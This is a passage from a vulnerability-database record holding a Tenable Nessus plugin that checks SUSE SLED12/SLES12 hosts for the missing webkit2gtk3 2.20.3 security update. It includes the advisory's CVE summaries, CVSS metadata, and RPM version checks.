several crashes and rendering issues.\n\nAdd ENABLE_ADDRESS_SANITIZER to make it easier to build with asan support.\n\nFix a crash under Wayland when using mesa software rasterization.\n\nMake fullscreen video work again.\n\nFix handling of missing GStreamer elements.\n\nFix rendering when webm video is played twice.\n\nFix 
kinetic scrolling sometimes jumping around.\n\nFix build with ICU configured without collation support.\n\nWebSockets use system proxy settings now (requires libsoup 2.61.90).\n\nShow the context menu on long-press gesture.\n\nAdd support for Shift + mouse scroll to scroll horizontally.\n\nFix zoom gesture to actually zoom instead of changing the page scale.\n\nImplement support for Graphics ARIA roles.\n\nMake sleep inhibitors work under Flatpak.\n\nAdd get element CSS value command to WebDriver.\n\nFix a crash after a swipe gesture.\n\nFix several crashes and rendering issues.\n\nFix crashes due to duplicated symbols in libjavascriptcoregtk and libwebkit2gtk.\n\nFix parsing of timeout values in WebDriver.\n\nImplement get timeouts command in WebDriver.\n\nFix deadlock in GStreamer video sink during shutdown when accelerated compositing is disabled.\n\nFix several crashes and rendering issues.\n\nAdd web process API to detect when form is submitted via JavaScript.\n\nAdd new API to replace webkit_form_submission_request_get_text_fields() that is now deprecated.\n\nAdd WebKitWebView::web-process-terminated signal and deprecate web-process-crashed.\n\nFix rendering issues when editing text areas.\n\nUse FastMalloc based GstAllocator for GStreamer.\n\nFix web process crash at startup in bmalloc.\n\nFix several memory leaks in GStreamer media backend.\n\nWebKitWebDriver process no longer links to libjavascriptcoregtk.\n\nFix several crashes and rendering issues.\n\nAdd new API to add, retrieve and delete cookies via WebKitCookieManager.\n\nAdd functions to WebSettings to convert font sizes between points and pixels.\n\nEnsure cookie operations take effect when they happen before a web process has been spawned.\n\nAutomatically adjust font size when GtkSettings:gtk-xft-dpi changes.\n\nAdd initial resource load statistics support.\n\nAdd API to expose availability of certain editing commands in WebKitEditorState.\n\nAdd API to query whether a WebKitNavigationAction is 
a redirect or not.\n\nImprove complex text rendering.\n\nAdd support for the 'system' CSS font family.\n\nDisable USE_GSTREAMER_GL\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-10-25T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : webkit2gtk3 (SUSE-SU-2018:3387-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165", "CVE-2018-11646", "CVE-2018-11712", "CVE-2018-11713", "CVE-2018-12911", "CVE-2018-4088", "CVE-2018-4096", "CVE-2018-4101", "CVE-2018-4113", "CVE-2018-4114", "CVE-2018-4117", "CVE-2018-4118", "CVE-2018-4119", "CVE-2018-4120", "CVE-2018-4121", "CVE-2018-4122", "CVE-2018-4125", "CVE-2018-4127", "CVE-2018-4128", "CVE-2018-4129", "CVE-2018-4133", "CVE-2018-4146", "CVE-2018-4161", "CVE-2018-4162", "CVE-2018-4163", "CVE-2018-4165", "CVE-2018-4190", "CVE-2018-4199", "CVE-2018-4200", "CVE-2018-4204", "CVE-2018-4218", "CVE-2018-4222", "CVE-2018-4232", "CVE-2018-4233", "CVE-2018-4246"], "modified": "2019-09-10T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0", "p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore", "p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2018-3387-1.NASL", "href": 
"https://www.tenable.com/plugins/nessus/118389", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:3387-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118389);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/09/10 13:51:49\");\n\n script_cve_id(\"CVE-2017-13884\", \"CVE-2017-13885\", \"CVE-2017-7153\", \"CVE-2017-7160\", \"CVE-2017-7161\", \"CVE-2017-7165\", \"CVE-2018-11646\", \"CVE-2018-11712\", \"CVE-2018-11713\", \"CVE-2018-12911\", \"CVE-2018-4088\", \"CVE-2018-4096\", \"CVE-2018-4101\", \"CVE-2018-4113\", \"CVE-2018-4114\", \"CVE-2018-4117\", \"CVE-2018-4118\", \"CVE-2018-4119\", \"CVE-2018-4120\", \"CVE-2018-4121\", \"CVE-2018-4122\", \"CVE-2018-4125\", \"CVE-2018-4127\", \"CVE-2018-4128\", \"CVE-2018-4129\", \"CVE-2018-4133\", \"CVE-2018-4146\", \"CVE-2018-4161\", \"CVE-2018-4162\", \"CVE-2018-4163\", \"CVE-2018-4165\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4200\", \"CVE-2018-4204\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\", \"CVE-2018-4246\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : webkit2gtk3 (SUSE-SU-2018:3387-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for webkit2gtk3 to version 2.20.3 fixes the issues :\n\nThe following security vulnerabilities were addressed :\n\nCVE-2018-12911: Fixed an off-by-one error in xdg_mime_get_simple_globs\n(boo#1101999)\n\nCVE-2017-13884: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website 
(bsc#1075775).\n\nCVE-2017-13885: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1075775).\n\nCVE-2017-7153: An unspecified issue allowed remote attackers to spoof\nuser-interface information (about whether the entire content is\nderived from a valid TLS session) via a crafted website that sends a\n401 Unauthorized redirect (bsc#1077535).\n\nCVE-2017-7160: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1075775).\n\nCVE-2017-7161: An unspecified issue allowed remote attackers to\nexecute arbitrary code via special characters that trigger command\ninjection (bsc#1075775, bsc#1077535).\n\nCVE-2017-7165: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1075775).\n\nCVE-2018-4088: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1075775).\n\nCVE-2018-4096: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1075775).\n\nCVE-2018-4200: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website that triggers a\nWebCore::jsElementScrollHeightGetter use-after-free (bsc#1092280).\n\nCVE-2018-4204: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1092279).\n\nCVE-2018-4101: An unspecified issue allowed remote attackers to\nexecute arbitrary code 
or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4113: An issue in the JavaScriptCore function in the 'WebKit'\ncomponent allowed attackers to trigger an assertion failure by\nleveraging improper array indexing (bsc#1088182)\n\nCVE-2018-4114: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182)\n\nCVE-2018-4117: An unspecified issue allowed remote attackers to bypass\nthe Same Origin Policy and obtain sensitive information via a crafted\nwebsite (bsc#1088182, bsc#1102530).\n\nCVE-2018-4118: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182)\n\nCVE-2018-4119: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182)\n\nCVE-2018-4120: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4121: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1092278).\n\nCVE-2018-4122: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4125: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4127: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service 
(memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4128: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4129: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4146: An unspecified issue allowed attackers to cause a\ndenial of service (memory corruption) via a crafted website\n(bsc#1088182).\n\nCVE-2018-4161: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4162: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4163: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4165: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4190: An unspecified issue allowed remote attackers to obtain\nsensitive credential information that is transmitted during a CSS\nmask-image fetch (bsc#1097693)\n\nCVE-2018-4199: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (buffer overflow\nand application crash) via a crafted website (bsc#1097693)\n\nCVE-2018-4218: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website that triggers 
an\n@generatorState use-after-free (bsc#1097693)\n\nCVE-2018-4222: An unspecified issue allowed remote attackers to\nexecute arbitrary code via a crafted website that leverages a\ngetWasmBufferFromValue out-of-bounds read during WebAssembly\ncompilation (bsc#1097693)\n\nCVE-2018-4232: An unspecified issue allowed remote attackers to\noverwrite cookies via a crafted website (bsc#1097693)\n\nCVE-2018-4233: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1097693)\n\nCVE-2018-4246: An unspecified issue allowed remote attackers to\nexecute arbitrary code via a crafted website that leverages type\nconfusion (bsc#1104169)\n\nCVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL and\nwebkitFaviconDatabaseSetIconURLForPageURL mishandled an unset pageURL,\nleading to an application crash (bsc#1095611)\n\nCVE-2018-4133: A Safari cross-site scripting (XSS) vulnerability\nallowed remote attackers to inject arbitrary web script or HTML via a\ncrafted URL (bsc#1088182).\n\nCVE-2018-11713: The libsoup network backend of WebKit unexpectedly\nfailed to use system proxy settings for WebSocket connections. 
As a\nresult, users could be deanonymized by crafted websites via a\nWebSocket connection (bsc#1096060).\n\nCVE-2018-11712: The libsoup network backend of WebKit failed to\nperform TLS certificate verification for WebSocket connections\n(bsc#1096061).\n\nThis update for webkit2gtk3 fixes the following issues: Fixed a crash\nwhen atk_object_ref_state_set is called on an AtkObject that's being\ndestroyed (bsc#1088932).\n\nFixed crash when using Wayland with QXL/virtio (bsc#1079512)\n\nDisable Gigacage if mmap fails to allocate in Linux.\n\nAdd user agent quirk for paypal website.\n\nProperly detect compiler flags, needed libs, and fallbacks for usage\nof 64-bit atomic operations.\n\nFix a network process crash when trying to get cookies of about:blank\npage.\n\nFix UI process crash when closing the window under Wayland.\n\nFix several crashes and rendering issues.\n\nDo TLS error checking on GTlsConnection::accept-certificate to finish\nthe load earlier in case of errors.\n\nProperly close the connection to the nested wayland compositor in the\nWeb Process.\n\nAvoid painting backing stores for zero-opacity layers.\n\nFix downloads started by context menu failing in some websites due to\nmissing user agent HTTP header.\n\nFix video unpause when GStreamerGL is disabled.\n\nFix several GObject introspection annotations.\n\nUpdate user agent quiks to fix Outlook.com and Chase.com.\n\nFix several crashes and rendering issues.\n\nImprove error message when Gigacage cannot allocate virtual memory.\n\nAdd missing WebKitWebProcessEnumTypes.h to webkit-web-extension.h.\n\nImprove web process memory monitor thresholds.\n\nFix a web process crash when the web view is created and destroyed\nquickly.\n\nFix a network process crash when load is cancelled while searching for\nstored HTTP auth credentials.\n\nFix the build when ENABLE_VIDEO, ENABLE_WEB_AUDIO and ENABLE_XSLT are\ndisabled.\n\nNew API to retrieve and delete cookies with WebKitCookieManager.\n\nNew web process API to 
detect when form is submitted via JavaScript.\n\nSeveral improvements and fixes in the touch/gestures support.\n\nSupport for the\n“system” CSS font family.\n\nComplex text rendering improvements and fixes.\n\nMore complete and spec compliant WebDriver implementation.\n\nEnsure DNS prefetching cannot be re-enabled if disabled by settings.\n\nFix seek sometimes not working.\n\nFix rendering of emojis that were using the wrong scale factor in some\ncases.\n\nFix rendering of combining enclosed keycap.\n\nFix rendering scale of some layers in HiDPI.\n\nFix a crash in Wayland when closing the web view.\n\nFix crashes upower crashes when running inside a chroot or on systems\nwith broken dbus/upower.\n\nFix memory leaks in GStreamer media backend when using GStreamer 1.14.\n\nFix several crashes and rendering issues.\n\nAdd ENABLE_ADDRESS_SANITIZER to make it easier to build with asan\nsupport.\n\nFix a crash a under Wayland when using mesa software rasterization.\n\nMake fullscreen video work again.\n\nFix handling of missing GStreamer elements.\n\nFix rendering when webm video is played twice.\n\nFix kinetic scrolling sometimes jumping around.\n\nFix build with ICU configured without collation support.\n\nWebSockets use system proxy settings now (requires libsoup 2.61.90).\n\nShow the context menu on long-press gesture.\n\nAdd support for Shift + mouse scroll to scroll horizontally.\n\nFix zoom gesture to actually zoom instead of changing the page scale.\n\nImplement support for Graphics ARIA roles.\n\nMake sleep inhibitors work under Flatpak.\n\nAdd get element CSS value command to WebDriver.\n\nFix a crash aftter a swipe gesture.\n\nFix several crashes and rendering issues.\n\nFix crashes due to duplicated symbols in libjavascriptcoregtk and\nlibwebkit2gtk.\n\nFix parsing of timeout values in WebDriver.\n\nImplement get timeouts command in WebDriver.\n\nFix deadlock in GStreamer video sink during shutdown when accelerated\ncompositing is disabled.\n\nFix 
several crashes and rendering issues.\n\nAdd web process API to detect when form is submitted via JavaScript.\n\nAdd new API to replace\nwebkit_form_submission_request_get_text_fields() that is now\ndeprecated.\n\nAdd WebKitWebView::web-process-terminated signal and deprecate\nweb-process-crashed.\n\nFix rendering issues when editing text areas.\n\nUse FastMalloc based GstAllocator for GStreamer.\n\nFix web process crash at startup in bmalloc.\n\nFix several memory leaks in GStreamer media backend.\n\nWebKitWebDriver process no longer links to libjavascriptcoregtk.\n\nFix several crashes and rendering issues.\n\nAdd new API to add, retrieve and delete cookies via\nWebKitCookieManager.\n\nAdd functions to WebSettings to convert font sizes between points and\npixels.\n\nEnsure cookie operations take effect when they happen before a web\nprocess has been spawned.\n\nAutomatically adjust font size when GtkSettings:gtk-xft-dpi changes.\n\nAdd initial resource load statistics support.\n\nAdd API to expose availability of certain editing commands in\nWebKitEditorState.\n\nAdd API to query whether a WebKitNavigationAction is a redirect or\nnot.\n\nImprove complex text rendering.\n\nAdd support for the 'system' CSS font family.\n\nDisable USE_GSTREAMER_GL\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1075775\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1077535\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1079512\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1088182\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1088932\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1092278\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1092279\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1092280\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1095611\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1096060\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1096061\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1097693\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1101999\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1102530\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1104169\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-13884/\"\n 
);\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-13885/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7153/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7160/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7161/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7165/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11646/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11712/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11713/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-12911/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4088/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4096/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4101/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4113/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4114/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4117/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4118/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4119/\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4120/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4121/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4122/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4125/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4127/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4128/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4129/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4133/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4146/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4161/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4162/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4163/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4165/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4190/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4199/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4200/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4204/\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4218/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4222/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4232/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4233/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4246/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20183387-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3a02e1c7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP3:zypper in -t patch\nSUSE-SLE-WE-12-SP3-2018-2432=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2018-2432=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2018-2432=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2018-2432=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n 
script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! 
preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libjavascriptcoregtk-4_0-18-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libwebkit2gtk-4_0-37-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"typelib-1_0-WebKit2-4_0-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"webkit2gtk-4_0-injected-bundles-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"webkit2gtk3-debugsource-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", 